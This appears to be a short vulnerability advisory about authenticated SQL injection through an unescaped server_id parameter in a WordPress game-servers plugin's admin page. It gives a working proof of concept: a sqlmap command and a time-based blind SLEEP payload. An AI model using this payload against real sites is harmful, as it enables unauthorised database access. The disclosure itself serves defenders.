The plugin does not validate or escape the server_id parameter before using it in SQL statement, leading to an Authenticated SQL Injection in an admin page
sqlmap -u "https://example.com/wp-admin/admin.php?page=grohsfabian-add-game-servers&server_id=1" -p server_id --dbms mysql --cookie [your cookie] https://example.com/wp-admin/admin.php?page=grohsfabian-add-game-servers&server_id=1+OR+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)
2021-09-21 (about 9 months ago)
2021-09-21 (about 9 months ago)
2022-04-10 (about 2 months ago)